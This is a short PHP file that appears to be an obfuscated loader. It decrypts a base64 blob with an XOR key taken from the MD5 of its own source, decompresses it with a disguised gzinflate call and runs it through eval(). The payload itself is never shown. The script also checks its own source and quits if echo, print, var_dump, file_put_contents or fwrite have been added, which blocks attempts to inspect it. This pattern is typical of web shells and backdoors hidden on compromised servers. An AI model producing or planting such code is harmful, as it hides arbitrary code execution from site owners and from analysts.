<?php
$vhyttcnqeiaw="90f5fcb2e894f9fbdf52b235395f9fb3";
$zedvnghnm="0105560455545706505b5c51555d545a075e06535402570d510e055501030701";
$eucapmkeyact="VbphX/F3OXCaAchHIlrgJOMUL0RELScOF0ChjhiQk0d8nbTZpJLEr8TbxP4ZgwhyQiy1aZly3wcitEd/uvqnqVC7jVgYTg/2BcZewRpi80Ta2bZaVVHOfVkdiVHyyWQUlO1dpolwdTj2Sqc5jKGcdGq9VTVdq7MGGYiB6sd/CTMuQlvzURK6qJwvudsEO88DDOFILCmili9KfDxlRxlYAe81g8MKMQffqizpqhRabjUNDOEVm1AuCU7IQbhbJprytoo=";
$quuxzkwxdsc=file_get_contents(__FILE__);
$hslvddhwmzp=str_replace($eucapmkeyact,"",$quuxzkwxdsc);
if(strpos($hslvddhwmzp,"ec"."ho")!==false||strpos($hslvddhwmzp,"pr"."int")!==false||strpos($hslvddhwmzp,"var_"."dump")!==false||strpos($hslvddhwmzp,"file_put_"."contents")!==false||strpos($hslvddhwmzp,"fw"."rite")!==false){die();}
$rlawru=str_replace(array($vhyttcnqeiaw,$zedvnghnm),array("SP_7d02ec3c","KP_c3dc283b"),$quuxzkwxdsc);
$jzlpanl=md5($rlawru);
$kslrcvi=hex2bin($zedvnghnm);
$oanfsj="";
$uxpicqhtlmod=strlen($jzlpanl);
for($ujzzfmvjs=0;$ujzzfmvjs<$uxpicqhtlmod;$ujzzfmvjs++){
    $oanfsj.=chr(ord($kslrcvi[$ujzzfmvjs])^ord($jzlpanl[$ujzzfmvjs]));
}
$qninlnhds=base64_decode($eucapmkeyact);
$guqkyau=strlen($qninlnhds);
$znjvrmephmsy="";
$bbxfye=strlen($oanfsj);
for($ujzzfmvjs=0;$ujzzfmvjs<$guqkyau;$ujzzfmvjs++){
    $znjvrmephmsy.=$qninlnhds[$ujzzfmvjs]^$oanfsj[$ujzzfmvjs%$bbxfye];
}
$oicvnzuyvtk="gz"."in"."fl"."ate";
eval($oicvnzuyvtk($znjvrmephmsy));
